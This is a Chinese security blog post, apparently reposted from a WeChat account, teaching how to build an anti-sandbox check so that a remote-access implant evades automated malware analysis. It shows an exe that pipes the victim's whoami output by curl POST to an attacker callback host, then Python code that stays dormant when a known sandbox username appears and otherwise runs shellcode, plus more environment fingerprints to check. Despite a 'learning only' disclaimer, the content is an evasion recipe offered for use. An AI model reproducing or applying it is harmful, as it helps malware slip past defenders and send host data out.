免杀 | 一文教你如何写自己的反沙箱工具
2023-12-29 08:43:40 Author: F12sec(查看原文) 阅读量:32 收藏


申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
公众号现在只对常读和星标的公众号才展示大图推送,
建议大家把 明暗安全
 设为星标,否则可能就看不到啦!

1.漏洞背景

    简单地说,反沙箱技术指的是一种可以检测出虚拟环境的运行软件的技术。虚拟环境是指一种用于模拟真实操作系统的软件环境,软件通常会利用虚拟环境来隐藏自己的真实意图。而反沙箱技术通过识别虚拟环境的特征,从而发现并拦截软件的活动,保护我们的远控。

2.漏洞实例

  1. 首先启动我们的反连平台

用法在历史文章里,链接如下。

工具 | 无回显变可回显rce

我们用它的作用,是为了接受沙箱运行的反连,用来判断沙箱环境。

2. 制作一个python的exe

关键代码如下:

import os
result = os.system('whoami | curl -X POST -d @- http://ip:8881/')

使用pyinstaller打包为exe,并丢到反沙箱上。

pyinstaller -F ceshi.py

3. 查看反连

发现了一个特征,沙箱的whoami返回值为:

desktop-h9urb7t\administrator

4. 开始编写反沙箱代码。

import subprocess
def get_current_user(): """ 获取当前用户名 """ return subprocess.check_output("whoami").decode().strip()
# 获取当前用户current_user = get_current_user()
# 检查当前用户是否为 'desktop-h9urb7t\administrator'if current_user.lower() == r'desktop-h9urb7t\administrator'.lower(): print("当前用户为 desktop-h9urb7t\administrator,脚本不执行。")else: print("当前用户不是 desktop-h9urb7t\administrator,可以执行脚本。") # 在这里添加你想要执行的代码 实际的shellcode

OK,将shellcode替换为自己的免杀。重新丢到沙箱查看。成功bypass沙箱。

原理很简单,就是查看当前运行的环境的whoami值是否为

desktop-h9urb7t\administrator

是就不运行。

思考:

除了whoami,还有其他明显特征吗。

举例:

  • %USERNAME%%USERDOMAIN% 环境变量可以提供当前用户名和域名。

  • %COMPUTERNAME% 提供当前计算机的名称。

  • %OS% 可以告诉你操作系统类型。

  • %PROCESSOR_ARCHITECTURE% 提供处理器架构信息(例如x64或x86)。

 其实还有很多,如桌面文件,temp目录文件等,不一一列举。举一反三。
————————————————————
  • 往期精彩推荐

实战 | 记一次Bugcrowd实战挖掘
工具 | burp被动扫描xss神器
工具 | 无回显变可回显rce

❤️爱心三连击

1.本文已收录在明暗官方网站:http://www.php1nf0.top/



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247488789&idx=1&sn=50937e07d578b3e597c080ecac36549a&chksm=c12dfb68eb165f8f7edf138989352feed69ac6d5f64505a079e282fad67b4d075c262d95d8a9&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh